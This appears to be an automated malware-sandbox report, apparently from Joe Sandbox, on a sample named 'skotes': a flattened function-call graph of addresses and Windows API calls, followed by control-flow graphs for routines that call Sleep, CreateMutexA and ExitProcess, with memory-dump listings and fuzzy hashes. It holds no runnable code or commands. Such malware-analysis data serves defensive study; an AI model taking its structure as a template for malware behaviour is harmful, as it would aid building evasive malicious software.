b82d46 12026->12027 12028 b82d88 12027->12028 12029 b82d51 __floor_pentium4 12027->12029 12043 b9bef7 12027->12043 12031 b82440 4 API calls 12028->12031 12029->12013 12032 b82d9b 12031->12032 12032->12013 12034 b9d3e2 RtlAllocateHeap 12033->12034 12035 b82c0e 12034->12035 12068 b9b847 12035->12068 12037 b82c42 12038 b82c49 12037->12038 12074 b82c80 12037->12074 12038->12017 12040 b82c58 12077 b82560 12040->12077 12042 b82c65 std::_Throw_future_error 12044 b9bf03 12043->12044 12052 b82900 12044->12052 12046 b9bf23 std::_Throw_future_error 12047 b9bf6a 12046->12047 12048 b9bf73 12046->12048 12062 b9be7f 12047->12062 12050 b82ae0 5 API calls 12048->12050 12051 b9bf6f 12050->12051 12051->12028 12053 b980c0 RtlAllocateHeap 12052->12053 12054 b8294f 12053->12054 12055 b826b0 RtlAllocateHeap 12054->12055 12057 b82967 12055->12057 12056 b8298d shared_ptr 12056->12046 12057->12056 12058 bb6c6a RtlAllocateHeap 12057->12058 12059 b829b6 12058->12059 12060 bb38af ___std_exception_copy RtlAllocateHeap 12059->12060 12061 b829e4 12060->12061 12061->12046 12063 b9cc31 InitOnceExecuteOnce 12062->12063 12064 b9be97 12063->12064 12065 b9be9e 12064->12065 12066 bb6cbb 4 API calls 12064->12066 12065->12051 12067 b9bea7 12066->12067 12067->12051 12069 b9b854 12068->12069 12073 b9b873 Concurrency::details::_Reschedule_chore 12068->12073 12080 b9cb77 12069->12080 12071 b9b864 12071->12073 12082 b9b81e 12071->12082 12073->12037 12075 b9b7fb TpReleaseWork 12074->12075 12076 b82cb2 shared_ptr 12075->12076 12076->12040 12078 bb38af ___std_exception_copy RtlAllocateHeap 12077->12078 12079 b82597 __floor_pentium4 12078->12079 12079->12042 12081 b9cb92 CreateThreadpoolWork 12080->12081 12081->12071 12083 b9b827 Concurrency::details::_Reschedule_chore 12082->12083 12086 b9cdcc 12083->12086 12085 b9b841 12085->12073 12087 b9cde1 TpPostWork 12086->12087 12087->12085 12088 b985e0 12089 b985f6 12088->12089 12089->12089 12090 b9860b 12089->12090 12091 b98f40 RtlAllocateHeap 12089->12091 12091->12090 12092 b98de0 12093 b98f2f 12092->12093 12094 b98e05 12092->12094 12095 b99270 RtlAllocateHeap 12093->12095 12098 b98e4c 12094->12098 12099 b98e76 12094->12099 12096 b98f34 12095->12096 12097 b82480 RtlAllocateHeap 12096->12097 12105 b98e5d __cftof 12097->12105 12098->12096 12100 b98e57 12098->12100 12101 b9d3e2 RtlAllocateHeap 12099->12101 12099->12105 12103 b9d3e2 RtlAllocateHeap 12100->12103 12101->12105 12102 bb6c6a RtlAllocateHeap 12104 b98f3e 12102->12104 12103->12105 12105->12102 12106 b98eed shared_ptr __cftof 12105->12106 12107 b887d0 12108 b888d3 12107->12108 12116 b88819 shared_ptr 12107->12116 12109 b980c0 RtlAllocateHeap 12108->12109 12115 b88923 12109->12115 12110 b8896c 12111 b98200 RtlAllocateHeap 12110->12111 12114 b88971 12111->12114 12112 b88949 shared_ptr 12113 b980c0 RtlAllocateHeap 12113->12116 12115->12112 12117 bb6c6a RtlAllocateHeap 12115->12117 12116->12108 12116->12110 12116->12113 12116->12115 12117->12110 12153 b821c0 12154 b821cb 12153->12154 12155 b821d0 12153->12155 12156 b821d4 12155->12156 12160 b821ec __cftof 12155->12160 12157 bb75f6 __dosmaperr RtlAllocateHeap 12156->12157 12158 b821d9 12157->12158 12159 bb6c5a ___std_exception_copy RtlAllocateHeap 12158->12159 12161 b821e4 12159->12161 12162 b821fc __cftof 12160->12162 12163 b8223a 12160->12163 12164 b82221 12160->12164 12166 b82231 12163->12166 12168 bb75f6 __dosmaperr RtlAllocateHeap 12163->12168 12165 bb75f6 __dosmaperr RtlAllocateHeap 12164->12165 12167 b82226 12165->12167 12169 bb6c5a ___std_exception_copy RtlAllocateHeap 12167->12169 12170 b82247 12168->12170 12169->12166 12171 bb6c5a ___std_exception_copy RtlAllocateHeap 12170->12171 12172 b82252 12171->12172 12181 b979c0 12182 b979e0 12181->12182 12182->12182 12183 b980c0 RtlAllocateHeap 12182->12183 12184 b979f2 12183->12184 12185 b983c0 12186 b97760 RtlAllocateHeap 12185->12186 12187 b98439 12186->12187 12188 b98f40 RtlAllocateHeap 12187->12188 12189 b98454 12187->12189 12188->12189 12190 b98f40 RtlAllocateHeap 12189->12190 12192 b984a8 12189->12192 12191 b984ee 12190->12191 12205 b86535 12207 b86549 shared_ptr 12205->12207 12206 bb6c6a RtlAllocateHeap 12209 b865dc 12206->12209 12207->12206 12208 b865b1 shared_ptr __floor_pentium4 12207->12208 12210 b97a00 RtlAllocateHeap 12209->12210 12211 b866a6 12210->12211 12212 b85c10 4 API calls 12211->12212 12213 b866ac 12212->12213 12214 b85c10 4 API calls 12213->12214 12215 b866b1 12214->12215 12216 b822c0 4 API calls 12215->12216 12217 b866c9 shared_ptr 12216->12217 12218 b97a00 RtlAllocateHeap 12217->12218 12219 b86732 12218->12219 12220 b85c10 4 API calls 12219->12220 12221 b8673d 12220->12221 12222 b822c0 4 API calls 12221->12222 12231 b86757 shared_ptr 12222->12231 12223 b86852 12224 b980c0 RtlAllocateHeap 12223->12224 12226 b8689c 12224->12226 12225 b97a00 RtlAllocateHeap 12225->12231 12227 b980c0 RtlAllocateHeap 12226->12227 12230 b868e3 shared_ptr __floor_pentium4 12227->12230 12228 b85c10 4 API calls 12228->12231 12229 b822c0 4 API calls 12229->12231 12231->12223 12231->12225 12231->12228 12231->12229 12232 bb6729 12235 bb6672 12232->12235 12234 bb673b 12238 bb667e __dosmaperr 12235->12238 12236 bb6685 12237 bb75f6 __dosmaperr RtlAllocateHeap 12236->12237 12239 bb668a 12237->12239 12238->12236 12240 bb66a5 12238->12240 12241 bb6c5a ___std_exception_copy RtlAllocateHeap 12239->12241 12242 bb66aa 12240->12242 12243 bb66b7 12240->12243 12248 bb6695 12241->12248 12244 bb75f6 __dosmaperr RtlAllocateHeap 12242->12244 12249 bba8c3 12243->12249 12244->12248 12246 bb66c0 12247 bb75f6 __dosmaperr RtlAllocateHeap 12246->12247 12246->12248 12247->12248 12248->12234 12250 bba8cf __dosmaperr 12249->12250 12253 bba967 12250->12253 12252 bba8ea 12252->12246 12254 bba98a 12253->12254 12255 bbd82f __dosmaperr RtlAllocateHeap 12254->12255 12258 bba9d0 12254->12258 12256 bba9eb 12255->12256 12257 bbadf5 __freea RtlAllocateHeap 12256->12257 12257->12258 12258->12252 12264 b84120 12265 b8416a 12264->12265 12266 b841a6 12265->12266 12268 b841f6 12265->12268 12267 b83ee0 4 API calls 12266->12267 12270 b841b2 __floor_pentium4 12267->12270 12271 b9b6be 12268->12271 12272 b9b6ca 12271->12272 12275 b975a0 12272->12275 12276 b975ab Concurrency::cancel_current_task std::_Throw_future_error 12275->12276 12277 b9c0e9 std::invalid_argument::invalid_argument RtlAllocateHeap 12276->12277 12278 b9c1aa std::_Throw_future_error 12277->12278 12314 b98320 12315 b98339 12314->12315 12316 b98f40 RtlAllocateHeap 12315->12316 12317 b9834d 12315->12317 12316->12317 12318 b8211c 12319 b82126 12318->12319 12320 b9d64e RtlAllocateHeap 12319->12320 12321 b82132 12320->12321 12322 b9d111 12323 b9d122 12322->12323 12324 b9d12a 12323->12324 12326 b9d199 12323->12326 12327 b9d1c0 12326->12327 12328 b9d1a7 SleepConditionVariableCS 12326->12328 12327->12323 12328->12327 12333 b82b10 12334 b82b1a 12333->12334 12335 b82b1c 12333->12335 12336 b9c26a 5 API calls 12335->12336 12337 b82b22 12336->12337 12338 b98510 12339 b9855f 12338->12339 12341 b9856c 12338->12341 12344 b99d00 12339->12344 12342 b985c4 12341->12342 12365 b9a060 12341->12365 12345 b99e31 12344->12345 12349 b99d25 12344->12349 12346 b99270 RtlAllocateHeap 12345->12346 12357 b99d8b __cftof 12346->12357 12347 bb6c6a RtlAllocateHeap 12356 b99e3b 12347->12356 12348 b99e2c 12350 b82480 RtlAllocateHeap 12348->12350 12349->12348 12351 b99d7a 12349->12351 12352 b99da1 12349->12352 12350->12345 12351->12348 12353 b99d85 12351->12353 12354 b9d3e2 RtlAllocateHeap 12352->12354 12352->12357 12355 b9d3e2 RtlAllocateHeap 12353->12355 12354->12357 12355->12357 12358 b99e6a shared_ptr 12356->12358 12359 bb6c6a RtlAllocateHeap 12356->12359 12357->12347 12360 b99dfc shared_ptr __cftof 12357->12360 12358->12341 12361 b99e8e 12359->12361 12360->12341 12362 b99ec0 shared_ptr 12361->12362 12363 bb6c6a RtlAllocateHeap 12361->12363 12362->12341 12364 b99ee6 12363->12364 12366 b9a1b1 12365->12366 12369 b9a083 12365->12369 12367 b99270 RtlAllocateHeap 12366->12367 12378 b9a0e4 __cftof 12367->12378 12368 bb6c6a RtlAllocateHeap 12377 b9a1bb shared_ptr 12368->12377 12370 b9a1ac 12369->12370 12371 b9a0fd 12369->12371 12372 b9a0d3 12369->12372 12373 b82480 RtlAllocateHeap 12370->12373 12376 b9d3e2 RtlAllocateHeap 12371->12376 12371->12378 12372->12370 12374 b9a0de 12372->12374 12373->12366 12375 b9d3e2 RtlAllocateHeap 12374->12375 12375->12378 12376->12378 12377->12341 12378->12368 12379 b9a16c shared_ptr __cftof 12378->12379 12379->12341 12398 b84300 12399 b8432e 12398->12399 12401 b84359 shared_ptr 12398->12401 12400 bb6c6a RtlAllocateHeap 12399->12400 12399->12401 12402 b843eb 12400->12402 12428 b83970 12429 b9c68b __Mtx_init_in_situ 2 API calls 12428->12429 12430 b839a7 12429->12430 12431 b9c68b __Mtx_init_in_situ 2 API calls 12430->12431 12432 b839e6 12431->12432 12433 b82170 12438 b9c6fc 12433->12438 12436 b9d64e RtlAllocateHeap 12437 b82184 12436->12437 12439 b9c70c 12438->12439 12440 b8217a 12438->12440 12439->12440 12442 b9cfbe 12439->12442 12440->12436 12443 b9ccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12442->12443 12444 b9cfd0 12443->12444 12444->12439 12445 b83770 12446 b8379b 12445->12446 12447 b837cd shared_ptr 12446->12447 12448 bb6c6a RtlAllocateHeap 12446->12448 12449 b8380f 12448->12449 12450 b85f76 12452 b85f81 shared_ptr 12450->12452 12451 b85ffe shared_ptr __floor_pentium4 12452->12451 12453 bb6c6a RtlAllocateHeap 12452->12453 12454 b8601b 12453->12454 12455 b980c0 RtlAllocateHeap 12454->12455 12456 b86089 12455->12456 12457 b980c0 RtlAllocateHeap 12456->12457 12458 b860bd 12457->12458 12459 b980c0 RtlAllocateHeap 12458->12459 12460 b860ee 12459->12460 12461 b980c0 RtlAllocateHeap 12460->12461 12462 b8611f 12461->12462 12463 b980c0 RtlAllocateHeap 12462->12463 12465 b86150 12463->12465 12464 b865b1 shared_ptr __floor_pentium4 12465->12464 12466 bb6c6a RtlAllocateHeap 12465->12466 12467 b865dc 12466->12467 12468 b97a00 RtlAllocateHeap 12467->12468 12469 b866a6 12468->12469 12470 b85c10 4 API calls 12469->12470 12471 b866ac 12470->12471 12472 b85c10 4 API calls 12471->12472 12473 b866b1 12472->12473 12474 b822c0 4 API calls 12473->12474 12475 b866c9 shared_ptr 12474->12475 12476 b97a00 RtlAllocateHeap 12475->12476 12477 b86732 12476->12477 12478 b85c10 4 API calls 12477->12478 12479 b8673d 12478->12479 12480 b822c0 4 API calls 12479->12480 12489 b86757 shared_ptr 12480->12489 12481 b86852 12482 b980c0 RtlAllocateHeap 12481->12482 12484 b8689c 12482->12484 12483 b97a00 RtlAllocateHeap 12483->12489 12485 b980c0 RtlAllocateHeap 12484->12485 12488 b868e3 shared_ptr __floor_pentium4 12485->12488 12486 b85c10 4 API calls 12486->12489 12487 b822c0 4 API calls 12487->12489 12489->12481 12489->12483 12489->12486 12489->12487 12533 b8215a 12534 b9c6fc InitializeCriticalSectionEx 12533->12534 12535 b82164 12534->12535 12536 b9d64e RtlAllocateHeap 12535->12536 12537 b8216e 12536->12537 12538 b8a54d 12539 b8a555 shared_ptr 12538->12539 12540 b8a944 12539->12540 12541 b8a628 shared_ptr 12539->12541 12542 bb6c6a RtlAllocateHeap 12540->12542 12545 b980c0 RtlAllocateHeap 12541->12545 12543 b8a949 12542->12543 12544 bb6c6a RtlAllocateHeap 12543->12544 12546 b8a94e 12544->12546 12547 b8a903 12545->12547 12548 bb6c6a RtlAllocateHeap 12546->12548 12549 b8a953 Sleep CreateMutexA 12548->12549 12550 b8a98e 12549->12550 12603 b89f44 12604 b89f4c shared_ptr 12603->12604 12605 b8a92b 12604->12605 12606 b8a01f shared_ptr 12604->12606 12607 b8a953 Sleep CreateMutexA 12605->12607 12608 bb6c6a RtlAllocateHeap 12605->12608 12610 b980c0 RtlAllocateHeap 12606->12610 12609 b8a98e 12607->12609 12608->12607 12611 b8a903 12610->12611

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 367 bb652b-bb6538 call bba302 370 bb655a-bb656c call bb656d ExitProcess 367->370 371 bb653a-bb6548 GetPEB 367->371 371->370 373 bb654a-bb6559 371->373 373->370
                                                                                                                                                                APIs
                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00BB652A,?,?,?,?,?,00BB7661), ref: 00BB6567
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                • Opcode ID: 7cc19ba7bb0e79d57238bc7fb22cf91d2470ce8bad7bef17cfdc6f08013199b0
                                                                                                                                                                • Instruction ID: 7eee61282b2a2a0962329b5440b13e0a3ec86c404453e80755375c32fd34e304
                                                                                                                                                                • Opcode Fuzzy Hash: 7cc19ba7bb0e79d57238bc7fb22cf91d2470ce8bad7bef17cfdc6f08013199b0
                                                                                                                                                                • Instruction Fuzzy Hash: 25E08C3000120CAFCE367B19CC49EAC3BA9EB61746F400851FC1846222CBA9EDA2C680

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 8eb3ac8585a3cfb44e76c1e6385b9a30c28d4d0a748de6441b70a06f0fd39996
                                                                                                                                                                • Instruction ID: 088b7d2b8736de5200752b2081af61a0871ad8b88df323ecead22fa1c2e26389
                                                                                                                                                                • Opcode Fuzzy Hash: 8eb3ac8585a3cfb44e76c1e6385b9a30c28d4d0a748de6441b70a06f0fd39996
                                                                                                                                                                • Instruction Fuzzy Hash: 78312A31A042049BFF08AB78DDC97ADBBE2EB86314F248299E054D73E5CB769981C751

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 22 b89f44-b89f64 26 b89f92-b89fae 22->26 27 b89f66-b89f72 22->27 30 b89fdc-b89ffb 26->30 31 b89fb0-b89fbc 26->31 28 b89f88-b89f8f call b9d663 27->28 29 b89f74-b89f82 27->29 28->26 29->28 32 b8a92b 29->32 36 b8a029-b8a916 call b980c0 30->36 37 b89ffd-b8a009 30->37 34 b89fbe-b89fcc 31->34 35 b89fd2-b89fd9 call b9d663 31->35 39 b8a953-b8a994 Sleep CreateMutexA 32->39 40 b8a92b call bb6c6a 32->40 34->32 34->35 35->30 43 b8a00b-b8a019 37->43 44 b8a01f-b8a026 call b9d663 37->44 51 b8a996-b8a998 39->51 52 b8a9a7-b8a9a8 39->52 40->39 43->32 43->44 44->36 51->52 54 b8a99a-b8a9a5 51->54 54->52
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
